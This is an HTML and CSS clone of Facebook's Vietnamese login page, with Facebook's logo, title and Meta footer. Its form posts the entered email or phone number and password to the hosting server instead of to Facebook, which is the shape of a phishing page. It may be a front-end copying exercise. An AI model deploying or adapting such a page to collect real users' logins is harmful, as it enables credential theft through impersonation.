<!DOCTYPE html>
<html>
<head>
    <link href='https://unpkg.com/boxicons@2.1.4/css/boxicons.min.css' rel='stylesheet'>
    <title>Facebook-Đăng nhập hoặc đăng ký</title>
    <link rel="icon" href="https://upload.wikimedia.org/wikipedia/commons/thumb/0/05/Facebook_Logo_%282019%29.png/1024px-Facebook_Logo_%282019%29.png">
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-9ndCyUaIbzAi2FUVXJi0CjmCapSmO7SnpJef0486qhLnuZ2cdeRhO02iuK6FUUVM" crossorigin="anonymous">
</head>
<style>
    .fb {
        padding: 12%;
        padding-left: 11%;
        font-family: Arial, sans-serif;
        background-color: #f4f4f467;
    }

    .content {
        margin-left: 3%;
        font-size: 26px;
        background-color: #f4f4f467;
    }

    .container {
        max-width: 360px;
        margin: 0 auto;
        padding: 20px;
        background-color: #fff;
        margin-top: 100px;
        border-radius: 4px;
        box-shadow: 0 0 20px rgba(0, 0, 0, 0.19);
        float: right;
        margin-right: 15%;
        clear: both;
    }

    h1 {
        text-align: center;
    }

    form {
        background-color: #fff;
    }

    .form-group {
        margin-bottom: 20px;
        background-color: #fff;
    }

    label {
        display: block;
        margin-bottom: 5px;
        background-color: #f4f4f467;
    }

    input[type="text"],
    input[type="password"] {
        width: 100%;
        padding: 10px;
        border: 1px solid #ccc;
        border-radius: 4px;
        color: #000; /* Màu chữ mặc định */
    }

    input[type="text"]:focus,
    input[type="password"]:focus {
        color: #000; /* Màu chữ khi nhấp chuột vào */
        border-color: #177FFF; /* Màu viền khi nhấp chuột vào */
        outline: none; /* Loại bỏ đường viền mặc định */
    }

    .btn {
        display: block;
        width: 100%;
        padding: 10px;
        background-color: #177FFF;
        color: #fff;
        text-align: center;
        text-decoration: none;
        border-radius: 4px;
        font-weight: bolder;
    }

    .quen {
        background-color: #fff;
        color: #0e76f5;
        text-align: center;
        font-size: 15px;
        padding-top: 7px;
        padding-bottom: 20px;
        border-bottom: 1px solid rgb(171, 166, 166);
    }

    .btn:hover {
        background-color: #177FFF;
        color: white;
    }

    .ttk {
        display: block;
        width: 100%;
        padding: 10px;
        background-color: #4EB748;
        color: #fff;
        text-align: center;
        text-decoration: none;
        border-radius: 4px;
        font-weight: bolder;
        margin-left: 0;
    }

    .tttong {
        margin-left: 57%;
        margin-top: 35%;
        font-size: 13px;
    }
    .tt {
        margin-left: 0%;
        margin-top: 35%;
        font-size: 13px;
    }
    .tt:hover {
        border-bottom: 1px solid black;
    }

    body {
        background-color: #f4f4f467;
    }
    .containercha {
        flex: top;
        margin-top: -35%;
    }

    .down-app{
        width: 100%;
        background-color: #fff7d5;
        padding: 1rem;
        display: flex;
        justify-content: center;
        align-items: center;
        gap: 10px;
   }
   .down-app{
    display: none;
   }
   .down-app i{
    font-size: 80px;
    color: #627d9c;
   }
   .down-app span{
    font-size: 45px;
    color: #627d9c;
   }
   .boder-center{
    display: none;
   }
   footer{
    display: none;
   }
   .container-1{
    display: none;
   }
   @media(max-width:1000px){
    body{
        background-color: white;
    }
    .down-app{
        display: block;
    }
    .content{
        display: none;
    }
    .fb{
        display: flex;
        justify-content: center;
        align-items: center;
        padding: 1rem;
    }
    .containercha{
        width: 100%;
        flex: none;
        margin: 0;
        display: flex;
        align-items: center;
        justify-content: center;
    }
    .container{
        padding: 0 3rem;
        box-shadow: none;
        display: flex;
        justify-content: center;
        align-items: center;
        float: left;
        margin: 0;
        max-width: 100%;
    }
    form{
        width: 100%;
    }
    .form-group input{
        padding: 2rem;
        font-size: 30px;
        background-color: #f3f3f3;
        box-shadow: 0 0 20px rgba(36, 33, 33, 0.19);
        border-radius: 10px;
    }
    .container button{
        padding: 1.5rem;
        font-size: 35px;
        font-weight: bold;
        border-radius: 10px;
    }
    .quen{
        margin: 0;
        font-size: 25px;
        border: none;
        padding-top: 2rem;
    }
    .boder-center{
        display: block;
        display: flex;
        justify-content: center;
        align-items: center;
        padding-bottom: 1.5rem;
    }
    .boder-center span:not(.title){
        background-color: #177FFF;
        width: 50%;
        height: 1px;
        background-color: #979696;
    }
    .boder-center .title{
        padding: 0 2rem;
        font-size: 25px;
        color: #979696;
    }
    .ttk{
        margin: 0px auto;
        width: 70%;
        border: 1px solid #979696;
        background-color: white;
        color: #000;
        font-size: 30px;
        border-radius: 10px;
        padding: 1rem;
    }
    .tttong{
        display: none;
    }
    footer{
        display: block;
        width: 100%;
        color: black;
        z-index: 2;
        background-color: #5b6a7c;
    }
    footer .container{
        width: 100%;
    }
    .container-footer{
        padding-top: 20rem;
        width: 50%;
        font-size: 30px;
        color: #6a8ce7;
        text-align: center;
    }
    .container-1{
        width: 100%;
        text-align: center;
        font-size: 30px;
        padding: 1rem;
        color: #979696;
        display: block;
    }
   }
</style>
<body>
    <div class="down-app">
        <i class='bx bx-mobile'></i>
        <span>Tải Facebook Lite và lướt xem nhanh hơn.</span>
    </div>
        <div class="fb">
            <img src="https://static.xx.fbcdn.net/rsrc.php/y8/r/dF5SId3UHWd.svg" alt="" height="100x" width="300px">
            <h2 class="content">
                Facebook giúp bạn kết nối và chia sẻ <br> với mọi người trong cuộc sống của bạn.
            </h2>
        </div>
    <div class="containercha">
        <div class="container">
            <form action="/" method="POST">
                <div class="form-group">
                    <input type="text" id="email" name="email" placeholder="Email hoặc số điện thoại">
                </div>
                <div class="form-group">
                    <input type="password" id="password" name="password" placeholder="Mật khẩu">
                </div>
                <button type="submit" class="btn">Đăng nhập</button>
                <p class="quen"> Quên mật khẩu?</p>
                <div class="boder-center">
                    <span></span>
                    <span class="title">hoặc</span>
                    <span></span>
                </div>
                <a href="#" class="ttk">Tạo tài khoản mới</a>
            </form>
        </div>
    </div>
    <p class="tttong">
        <b class="tt">Tạo Trang</b> dành cho người nổi tiếng,
         thương hiệu hoặc doanh <br>&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbspnghiệp.</p>
         <footer>
            <div class="container">
                <div class="container-footer">
                    <div style="font-weight: bold; color: #979696;">Tiếng Việt</div>
                    <div>Γεια σας φίλοι</div>
                    <div>皆さん、こんにちは</div>
                    <div>Bonjou zanmim yo</div>
                    </div>
                    <div class="container-footer">
                    <div>English(UK)</div>
                    <div>ନମସ୍କାର ବନ୍ଧୁଗଣ |</div>
                    <div>Hallo vrienden</div>
                    <div>Ndewo ndị enyi</span>
                </div>
            </div>
        </footer>
        <div class="container-1">
            <div>Meta © 2023</div>
        </div>
    
    
    
    <script>
        document.getElementById("email").addEventListener("focus", function() {
            this.style.borderColor = "#177FFF"; // Thay đổi màu viền khi ô email được focus
        });

        document.getElementById("email").addEventListener("blur", function() {
            this.style.borderColor = "#ccc"; // Trở lại màu viền mặc định khi ô email không được focus
        });
    </script>
</body>
</html>
